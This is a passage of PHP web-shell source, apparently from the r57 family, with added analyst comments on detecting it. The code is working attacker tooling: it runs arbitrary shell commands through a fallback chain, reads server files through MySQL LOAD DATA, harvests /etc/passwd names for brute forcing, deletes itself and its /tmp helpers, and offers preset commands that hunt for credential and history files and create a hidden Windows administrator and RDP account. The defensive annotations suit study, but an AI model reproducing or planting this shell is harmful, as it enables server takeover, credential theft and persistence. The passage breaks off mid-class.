  1065.  echo "<b>File content</b><br><br>";
  1066.  echo "<textarea cols=121 rows=15 name=showloadfile>";
  // File read through the database client: a scratch table `thesunofvn` is created, the
  // POSTed path is loaded into it with LOAD DATA LOCAL INFILE, the rows are printed
  // HTML-escaped and the table is dropped again. The sequence is not guarded by any
  // condition, so it runs on every db_query request, with or without a file name.
  // Defender notes: DDL for a table named thesunofvn in MySQL logs is a strong indicator;
  // disabling local_infile on the server and in the PHP client configuration should close
  // this read path.
  1067.  @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  1068.  @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
  1069.  @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
  1070.  $r = @mysql_query("SELECT * FROM thesunofvn");
  1071.  while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
  1072.  @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  1073.  echo "</textarea></div>";
  1074.  echo "</form>";
  1075.  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  1076.  }
  // [analyst note] Clean-up switches. ?delete removes this script from disk; ?tmp removes a
  // fixed set of files under /tmp. Errors are suppressed in both cases. What creates the /tmp
  // files is outside this excerpt (presumably the bind / back-connect helpers named in the UI
  // strings - unconfirmed).
  // Defender note: /tmp/bdpl, /tmp/back, /tmp/bd, /tmp/bd.c, /tmp/dp, /tmp/dpc and /tmp/dpc.c
  // are worth searching for during triage. Their absence proves nothing, because this switch
  // deletes them, and a missing script file does not mean it was never there.
  1077. if(isset($_GET['delete']))
  1078.  {
  1079.    @unlink(__FILE__);
  1080.  }
  1081. if(isset($_GET['tmp']))
  1082.  {
  1083.    @unlink("/tmp/bdpl");
  1084.    @unlink("/tmp/back");
  1085.    @unlink("/tmp/bd");
  1086.    @unlink("/tmp/bd.c");
  1087.    @unlink("/tmp/dp");
  1088.    @unlink("/tmp/dpc");
  1089.    @unlink("/tmp/dpc.c");
  1090.  }
  // [analyst note] ?phpini view: prints every php.ini directive with its local and master
  // value as an HTML table, then stops. ws() is defined elsewhere in the file.
  1091. if(isset($_GET['phpini']))
  1092. {
  1093. echo $head;
  // Formats one ini value for display. The loose == '' test runs first, so false and null
  // already return 'no value' there, before the later bool / null branches are reached.
  // Objects are cast to arrays, and arrays are rendered via print_r() captured from an output buffer.
  1094. function U_value($value)
  1095.  {
  1096.  if ($value == '') return '<i>no value</i>';
  1097.  if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  1098.  if ($value === null) return 'NULL';
  1099.  if (@is_object($value)) $value = (array) $value;
  1100.  if (@is_array($value))
  1101.  {
  1102.  @ob_start();
  1103.  print_r($value);
  1104.  $value = @ob_get_contents();
  1105.  }
  1106.  return U_wordwrap((string) $value);
  1107.  }
  // HTML-escapes $str and inserts a <wbr /> break hint every 100 characters. The regex then
  // moves any hint that landed inside an HTML entity (&...;) to just after that entity.
  1108. function U_wordwrap($str)
  1109.  {
  1110.  $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  1111.  return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  1112.  }
  1113. if (@function_exists('ini_get_all'))
  1114.  {
  1115.  $r = '';
  1116.  echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Master Value</b></div></font></td></tr>';
  1117.  foreach (@ini_get_all() as $key=>$value)
  1118.   {
  1119.   $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  1120.   }
  1121.  echo $r;
  1122.  echo '</table>';
  1123.  }
  1124. echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1125. die();
  1126. }
  // [analyst note] ?cpu view: prints the lines of a file named "cpuinfo" as a two-column
  // table (text before the first ':' / text after it), or a '---' row when the file cannot
  // be read. The path is relative, so it resolves against the current working directory.
  // NOTE(review): probably meant to be /proc/cpuinfo - whether the working directory is
  // changed earlier is not visible in this excerpt.
  // $r is appended to without being initialised inside this handler.
  1127. if(isset($_GET['cpu']))
  1128.  {
  1129.    echo $head;
  1130.    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>CPU</b></font></div></td></tr></table><table width=100%>';
  1131.    $cpuf = @file("cpuinfo");
  1132.    if($cpuf)
  1133.     {
  1134.       $c = @sizeof($cpuf);
  1135.       for($i=0;$i<$c;$i++)
  1136.         {
  1137.           $info = @explode(":",$cpuf[$i]);
  1138.           if($info[1]==""){ $info[1]="---"; }
  1139.           $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1140.         }
  1141.       echo $r;
  1142.     }
  1143.    else
  1144.     {
  1145.       echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1146.     }
  1147.    echo '</table>';
  1148.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1149.    die();
  1150.  }
  // [analyst note] ?mem view: same layout as the CPU view, reading a file named "meminfo".
  // The path is relative, so it resolves against the current working directory.
  // NOTE(review): probably meant to be /proc/meminfo - not confirmed by this excerpt.
  // File content is written into the table without HTML escaping.
  1151. if(isset($_GET['mem']))
  1152.  {
  1153.    echo $head;
  1154.    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
  1155.    $memf = @file("meminfo");
  1156.    if($memf)
  1157.     {
  1158.       $c = sizeof($memf);
  1159.       for($i=0;$i<$c;$i++)
  1160.         {
  1161.           $info = explode(":",$memf[$i]);
  1162.           if($info[1]==""){ $info[1]="---"; }
  1163.           $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1164.         }
  1165.       echo $r;
  1166.     }
  1167.    else
  1168.     {
  1169.       echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
  1170.     }
  1171.    echo '</table>';
  1172.    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1173.    die();
  1174.  }
  // [analyst note] UI string table. Keys have the form '<language>_<id>'; only 'eng' entries
  // appear in this array. The labels list what the interface offers (command execution, port
  // bind / back-connect, file upload and download, FTP brute force, safe_mode / open_basedir
  // bypass tests, database dump, ...); the code behind most of them is outside this excerpt.
  // Distinctive strings such as '...::: ACCESS DENIED :::...' or 'Bypass php 5.2.6' are usable
  // as content-signature material when scanning web roots for copies of this file.
  1175. $lang=array(
  1176. /* --------------------------------------------------------------- */
  1177. 'eng_text1' =>'Executed command',
  1178. 'eng_text2' =>'Execute command on server',
  1179. 'eng_text3' =>'Run command',
  1180. 'eng_text4' =>'Work directory',
  1181. 'eng_text5' =>'Upload files on server',
  1182. 'eng_text6' =>'Local file',
  1183. 'eng_text7' =>'Aliases',
  1184. 'eng_text8' =>'Select alias',
  1185. 'eng_butt1' =>'Execute',
  1186. 'eng_butt2' =>'Upload',
  1187. 'eng_text9' =>'Bind port to /bin/bash',
  1188. 'eng_text10'=>'Port',
  1189. 'eng_text11'=>'Password for access',
  1190. 'eng_butt3' =>'Bind',
  1191. 'eng_text12'=>'back-connect',
  1192. 'eng_text13'=>'IP',
  1193. 'eng_text14'=>'Port',
  1194. 'eng_butt4' =>'Connect',
  1195. 'eng_text15'=>'Upload files from remote server',
  1196. 'eng_text16'=>'With',
  1197. 'eng_text17'=>'Remote file',
  1198. 'eng_text18'=>'Local file',
  1199. 'eng_text20'=>'Use',
  1200. 'eng_text21'=>' New name',
  1201. 'eng_text23'=>'Local port',
  1202. 'eng_text24'=>'Remote host',
  1203. 'eng_text25'=>'Remote port',
  1204. 'eng_text26'=>'Use',
  1205. 'eng_butt5' =>'Run',
  1206. 'eng_text28'=>'Work in safe_mode',
  1207. 'eng_text29'=>'...::: ACCESS DENIED :::...',
  1208. 'eng_butt6' =>'Change',
  1209. 'eng_text30'=>'Cat file',
  1210. 'eng_butt7' =>'Show',
  1211. 'eng_text31'=>'File not found',
  1212. 'eng_text32'=>'Eval PHP code',
  1213. 'eng_text33'=>'Test bypass open_basedir with cURL functions',
  1214. 'eng_text300'=>'read file from vul curl()',
  1215. 'eng_butt8' =>'Test',
  1216. 'eng_text34'=>'',
  1217. 'eng_text35'=>'Test bypass with load file in mysql',
  1218. 'eng_text36'=>'Db . Table',
  1219. 'eng_text37'=>'Login',
  1220. 'eng_text38'=>'Password',
  1221. 'eng_text39'=>'Database',
  1222. 'eng_text40'=>'Dump database table',
  1223. 'eng_butt9' =>'Dump',
  1224. 'eng_text41'=>'Save dump in file',
  1225. 'eng_text42'=>'Edit files',
  1226. 'eng_text43'=>'File for edit',
  1227. 'eng_butt10'=>'Save',
  1228. 'eng_text44'=>'Can\'t edit file! Only read access!',
  1229. 'eng_text45'=>'File saved',
  1230. 'eng_text46'=>'Show phpinfo()',
  1231. 'eng_text47'=>'Show variables from php.ini',
  1232. 'eng_text48'=>'Delete temp files',
  1233. 'eng_butt11'=>'Edit file',
  1234. 'eng_text49'=>'Delete script from server',
  1235. 'eng_text50'=>'View cpu info',
  1236. 'eng_text51'=>'View memory info',
  1237. 'eng_text52'=>'Find text',
  1238. 'eng_text53'=>'In dirs',
  1239. 'eng_text54'=>'Find text in files',
  1240. 'eng_butt12'=>'Find',
  1241. 'eng_text55'=>'Only in files',
  1242. 'eng_text56'=>'Nothing :(',
  1243. 'eng_text57'=>'Create/Delete File/Dir',
  1244. 'eng_text58'=>'name',
  1245. 'eng_text59'=>'file',
  1246. 'eng_text60'=>'dir',
  1247. 'eng_butt13'=>'Create/Delete',
  1248. 'eng_text61'=>'File created',
  1249. 'eng_text62'=>'Dir created',
  1250. 'eng_text63'=>'File deleted',
  1251. 'eng_text64'=>'Dir deleted',
  1252. 'eng_text65'=>'Create',
  1253. 'eng_text66'=>'Delete',
  1254. 'eng_text67'=>'Chown/Chgrp/Chmod',
  1255. 'eng_text68'=>'Command',
  1256. 'eng_text69'=>'param1',
  1257. 'eng_text70'=>'param2',
  1258. 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
  1259. 'eng_text72'=>'Text for find',
  1260. 'eng_text73'=>'Find in folder',
  1261. 'eng_text74'=>'Find in files',
  1262. 'eng_text75'=>'* you can use regexp',
  1263. 'eng_text76'=>'',
  1264. 'eng_text80'=>'Type',
  1265. 'eng_text81'=>'Net',
  1266. 'eng_text82'=>'Databases',
  1267. 'eng_text83'=>'Run SQL query',
  1268. 'eng_text84'=>'SQL query',
  1269. 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
  1270. 'eng_text86'=>'Download files from server',
  1271. 'eng_butt14'=>'Download',
  1272. 'eng_text87'=>'Download files from remote ftp-server',
  1273. 'eng_text88'=>'FTP-server:port',
  1274. 'eng_text89'=>'File on ftp',
  1275. 'eng_text90'=>'Transfer mode',
  1276. 'eng_text91'=>'Archivation',
  1277. 'eng_text92'=>'without archivation',
  1278. 'eng_text93'=>'FTP',
  1279. 'eng_text94'=>'FTP-bruteforce',
  1280. 'eng_text95'=>'Users list',
  1281. 'eng_text96'=>'Can\'t get users list',
  1282. 'eng_text97'=>'checked: ',
  1283. 'eng_text98'=>'success: ',
  1284. 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
  1285. 'eng_text100'=>'Send file to remote ftp server',
  1286. 'eng_text101'=>'Use reverse (user -> resu) login for password',
  1287. 'eng_text109'=>'Hide',
  1288. 'eng_text110'=>'Show',
  1289. 'eng_text111'=>'SQL-Server : Port',
  1290.  
  1291. 'eng_text115'=>'',
  1292. 'eng_text116'=>'Copy from',
  1293. 'eng_text117'=>'to',
  1294. 'eng_text118'=>'File copied',
  1295. 'eng_text119'=>'Cant copy file',
  1296. 'eng_text120'=>'SQL-Server',
  1297. 'eng_text121'=>'Vbulletin Deface',
  1298. 'eng_text122'=>'ln -s',
  1299. 'eng_text123'=>'Brute Cpanel Account',
  1300. 'eng_text124'=>'About me',
  1301. 'eng_text125'=>'Bypass php 5.2.6',
  1302. 'eng_text127'=>'Bypass php 5.2.9',
  1303. 'eng_text128'=>'Destroy file....',
  1304. 'eng_text129'=>'Useful',
  1305. 'eng_text130'=>'Downloaders',
  1306. 'eng_text131'=>'PHP Bypass',
  1307. 'eng_err0'=>'Error! Can\'t write in file ',
  1308. 'eng_err1'=>'Error! Can\'t read file ',
  1309. 'eng_err2'=>'Error! Can\'t create ',
  1310. 'eng_err5'=>'Error! Can\'t change dir on ftp',
  1311. 'eng_text200'=>'read file from vul copy()',
  1312. 'eng_text202'=>'where file in server',
  1313. 'eng_text203'=>'read file from vul ini_restore()',
  1314. 'eng_text204'=>'Show list users',
  1315. 'eng_text205'=>'write shell in this side',
  1316. 'eng_text206'=>'read dir',
  1317. 'eng_text207'=>'read dir from vul reg_glob',
  1318. 'eng_text209'=>'read dir from vul root',
  1319. 'eng_text210'=>'DeZender ',
  1320. 'eng_text211'=>'safe_mode off',
  1321. 'eng_text212'=>'Close safe_mode with php.ini',
  1322. 'eng_text213'=>'Close security_mod with .htaccess',
  1323. 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  1324. 'eng_text219'=>'Get file to server in safe_mode and change name',
  1325. 'eng_text223'=>'read file from funcution',
  1326. 'eng_text224'=>'read file from PLUGIN',
  1327. 'eng_text226' => 'Write to file',
  1328. 'eng_text230' => 'ionCube extension safe_mode bypass',
  1329. 'eng_text231' => 'win32std extension safe_mode bypass',
  1330. 'eng_text232' => 'win32service extension safe_mode bypass',
  1331. 'eng_text233' => 'perl extension safe_mode bypass',
  1332. 'eng_text234' => 'FFI extension safe_mode bypass',
  1333. 'eng_butt65'=>'Write',
  1334. );
  1335.  
// Preset command menu: each key is the label shown in the panel and each value
// is the shell command it stands for (the code that dispatches the selected
// command is outside this part of the file).
// Defender notes: the Unix presets enumerate config files, world-writable
// paths, service.pwd files, shell/MySQL history files and listening sockets;
// the Windows presets create a local account with a hard-coded name and
// password and add it to the Administrators and "Remote Desktop Users" groups.
// `find / ...` or `net user ... /add` spawned by the web-server account is a
// high-signal process-creation event, and the literal account name below is a
// usable indicator when auditing local users on a suspected host.
$aliases=array(
'________________for server unix ______________-'=>'dir -ao',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find /  -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'show opened ports'=>'netstat -an | grep -i listen',
'________________for server windows ______________-'=>'dir',
'1_add new user'=>'net user thesunofvn 123123 /add',
'2_add your user for admin group'=>'net localgroup administrators thesunofvn /add',
'3_add your user for Remote Desktop group'=>'net localgroup "Remote Desktop Users" thesunofvn /add',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
// Reusable HTML fragments for the panel: table rows/wrappers ($table_up1..3,
// $table_end1, $ts/$te), decorative glyphs ($arrow, $lb, $rb), the default font
// tag and the POST form wrapper ($fs/$fe). Presentation only; the fixed markup
// (e.g. "class=main bgcolor=Black", colour #2aff00) is stable text that can be
// matched in HTTP response bodies when hunting for this panel.
$table_up1  = "<tr><td class=main bgcolor=Black
><font face=Verdana size=-2><b><div class=tt align=center>:: ";
$table_up2  = " ::</div></b></font></td></tr><tr><td class=main>";
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=#2aff00>4</font>";
$lb = "<font color=#2aff00>[</font>";
$rb = "<font color=#2aff00>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";
  1372.  
// ?users handler: prints the page header, then either a "not available"
// message or the account names returned by get_users() in a textarea, then a
// link to the ?brute action and a BACK link, and stops the script.
// Defender notes: a GET containing the bare key `users` (and the follow-up
// `brute&thesunofvn=crack`) is a distinctive access-log pattern.
// NOTE(review): $_SERVER['PHP_SELF'] is written into href attributes unescaped.
if(isset($_GET['users']))
 {
 echo $head;
 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#2aff00>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center><textarea cols=20 rows=20>';
  foreach($users as $user) { echo $user."\n"; }
  echo '</textarea></center>';
  }
 echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&thesunofvn=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
  1385.  
// Working directory and OS detection.
// The POST field `dir` is passed straight to chdir(), so every later relative
// path in the request is resolved against a client-chosen directory.
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
// A second character of ":" (drive letter) is taken to mean Windows.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// Fallback when getcwd() returned nothing: look at the OS environment variable,
// then php_uname(); default to Unix when neither is available.
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    // NOTE(review): eregi() was removed in PHP 7.0; with the @ this branch
    // cannot work on current PHP — confirm the intended runtime.
    if(@eregi("^win",$os)) { $unix = 0; }
    else { $unix = 1; }
    }
 }
// cmd=search_text handler: searches files under the POSTed directories
// (s_dir) for the POSTed text (s_text), optionally restricted by s_mask when
// the `m` field is also set, renders the matches as an HTML table and exits.
// Defender notes: the request is a POST carrying s_dir, s_text and
// cmd=search_text; the directory and text are taken from the client without
// any restriction, so the only boundary is what the PHP process can read.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    echo $head;
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      // One header row per file, then one row per matching line
      // ($a is the line number, $b the highlighted line text).
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
        // Show backslashes in the path when the host was detected as Windows.
        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
          $r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
// Command-execution canary: runs `echo abcr57` through ex() and expects "r57"
// at offset 3 of the output; any other result sets $safe_mode, i.e. the panel
// treats shell execution as unavailable.
// Defender notes: this runs on every request that reaches this line, so the
// web-server account spawning a shell for this literal echo string is a
// reliable process-telemetry indicator for this family.
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Server banner from the environment, "-" when not set.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  1442. function ws($i)
  1443. {
  1444. return @str_repeat(" ",$i);
  1445. }
/**
 * Run a shell command and return whatever it printed.
 *
 * Uses the first available of exec, shell_exec, system, passthru and popen;
 * returns '' when $cfe is empty or none of the branches is taken. All calls
 * are @-silenced, so failures never reach the PHP error log.
 *
 * Defender notes: because this is a fallback chain, removing a single
 * function is not a mitigation — hardening has to cover every entry point
 * listed here (and proc_open, which other parts of a shell may use). The
 * durable detection is at the process layer: a web-server/PHP worker account
 * creating sh/cmd child processes.
 *
 * @param string $cfe command line, passed to the shell unmodified
 * @return string|null command output (shell_exec can return null)
 */
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    // exec() fills $res with an array of output lines; rejoin them.
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    // system() prints directly, so capture it with output buffering.
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   // Last resort: read the pipe in 1 KiB chunks until EOF.
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
/**
 * Return the account names from a passwd-format file.
 *
 * Reads passwd.txt from the current directory when it exists, otherwise
 * /etc/passwd, and collects the first colon-separated field of every line
 * that does not start with '#'.
 *
 * Defender notes: a stray passwd.txt next to a PHP file in a web root, or the
 * PHP worker opening /etc/passwd, are both worth alerting on; open_basedir
 * limits the second case.
 *
 * @return array|int list of names, or 0 when the file is empty or unreadable
 */
function get_users()
{
  $users = array();
if (file_exists('passwd.txt')) {
 $rows=file('passwd.txt');
  } else {
 $rows=file('/etc/passwd');
  }
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
        $user = @explode(":",$string);
        // Skip comment lines; everything else contributes its first field.
        if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
  1499. function err($n,$txt='')
  1500. {
  1501. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
  1502. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
  1503. if(!empty($txt)) { echo " $txt"; }
  1504. echo '</b></div></font></td></tr></table>';
  1505. return null;
  1506. }
  1507. function perms($mode)
  1508. {
  1509. if (!$GLOBALS['unix']) return 0;
  1510. if( $mode & 0x1000 ) { $type='p'; }
  1511. else if( $mode & 0x2000 ) { $type='c'; }
  1512. else if( $mode & 0x4000 ) { $type='d'; }
  1513. else if( $mode & 0x6000 ) { $type='b'; }
  1514. else if( $mode & 0x8000 ) { $type='-'; }
  1515. else if( $mode & 0xA000 ) { $type='l'; }
  1516. else if( $mode & 0xC000 ) { $type='s'; }
  1517. else $type='u';
  1518. $owner["read"] = ($mode & 00400) ? 'r' : '-';
  1519. $owner["write"] = ($mode & 00200) ? 'w' : '-';
  1520. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
  1521. $group["read"] = ($mode & 00040) ? 'r' : '-';
  1522. $group["write"] = ($mode & 00020) ? 'w' : '-';
  1523. $group["execute"] = ($mode & 00010) ? 'x' : '-';
  1524. $world["read"] = ($mode & 00004) ? 'r' : '-';
  1525. $world["write"] = ($mode & 00002) ? 'w' : '-';
  1526. $world["execute"] = ($mode & 00001) ? 'x' : '-';
  1527. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
  1528. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
  1529. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
  1530. $s=sprintf("%1s", $type);
  1531. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
  1532. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
  1533. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  1534. return trim($s);
  1535. }
  1536. function in($type,$name,$size,$value,$checked=0)
  1537. {
  1538.  $ret = "<input type=".$type." name=".$name." ";
  1539.  if($size != 0) { $ret .= "size=".$size." "; }
  1540.  $ret .= "value=\"".$value."\"";
  1541.  if($checked) $ret .= " checked";
  1542.  return $ret.">";
  1543. }
  1544. function which($pr)
  1545. {
  1546. $path = ex("which $pr");
  1547. if(!empty($path)) { return $path; } else { return $pr; }
  1548. }
/**
 * Write a base64-encoded blob to disk in decoded form.
 *
 * Opens $fname for writing (truncating it), writes base64_decode($text) and
 * closes the file; when the open fails it prints error 0 via err().
 *
 * Defender notes: this is the helper that can turn the base64 string
 * variables defined in this file into files on disk. File-integrity or
 * audit rules on the PHP worker creating new source/script files in
 * writable directories cover it; the caller and target paths are outside
 * this part of the file.
 *
 * @param string $fname destination path
 * @param string $text  base64-encoded content
 */
function cf($fname,$text)
{
 $w_file=@fopen($fname,"w") or err(0);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
  1558. function sr($l,$t1,$t2)
  1559.  {
  1560.  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
  1561.  }
  1562. if (!@function_exists("view_size"))
  1563. {
  1564. function view_size($size)
  1565. {
  1566.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  1567.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  1568.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  1569.  else {$size = $size . " B";}
  1570.  return $size;
  1571. }
  1572. }
  /**
   * Recursively list the files below a directory.
   *
   * Sub-directories are descended into; "." and ".." are skipped. When
   * $types is non-empty it is a ';'-separated list of extensions including
   * the dot (e.g. ".php;.inc") and only files whose extension is in the list
   * are returned. Unreadable directories yield an empty list.
   *
   * @param string $dir   directory to walk
   * @param string $types optional ';'-separated extension filter
   * @return array list of paths built as "<dir>/<name>"
   */
  function DirFilesR($dir,$types='')
  {
    $found = Array();
    $dh = @opendir($dir);
    if(!$dh)
      return $found;
    while (false !== ($entry = @readdir($dh)))
    {
      if ($entry == "." || $entry == "..")
        continue;
      $full = $dir."/".$entry;
      if(@is_dir($full))
      {
        $found = @array_merge($found,DirFilesR($full,$types));
        continue;
      }
      if($types)
      {
        // Extension = everything from the last dot to the end of the name.
        $dot = @strrpos($entry,".");
        $suffix = @substr($entry,$dot,@strlen($entry)-$dot);
        if(!@in_array($suffix,explode(';',$types)))
          continue;
      }
      $found[] = $full;
    }
    @closedir($dh);
    return $found;
  }
  /**
   * Text search over a set of files: collects the files to scan at
   * construction time and, in SearchText(), records every line that matches.
   *
   * NOTE(review): the constructor uses the PHP 4 convention of a method named
   * after the class; PHP 8 no longer treats such a method as a constructor, so
   * `new SearchResult(...)` would leave every property unset there — confirm
   * the intended runtime.
   */
  class SearchResult
  {
    var $text;              // raw search text as given by the caller
    var $FilesToSearch;     // list of file paths gathered by DirFilesR()
    var $ResultFiles;       // [path][line number] => highlighted line
    var $FilesTotal;        // count of $FilesToSearch
    var $MatchesCount;      // total matches over all files
    var $FileMatschesCount; // NOTE(review): misspelt; the methods below use FileMatchesCount
    var $TimeStart;         // getmicrotime() at construction
    var $TimeTotal;         // elapsed seconds, set at the end of SearchText()
    var $titles;            // initialised to an empty array; not filled in this class
    /**
     * @param string $dir    one or more directories separated by ';'
     * @param string $text   search text
     * @param string $filter optional extension filter passed to DirFilesR()
     */
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
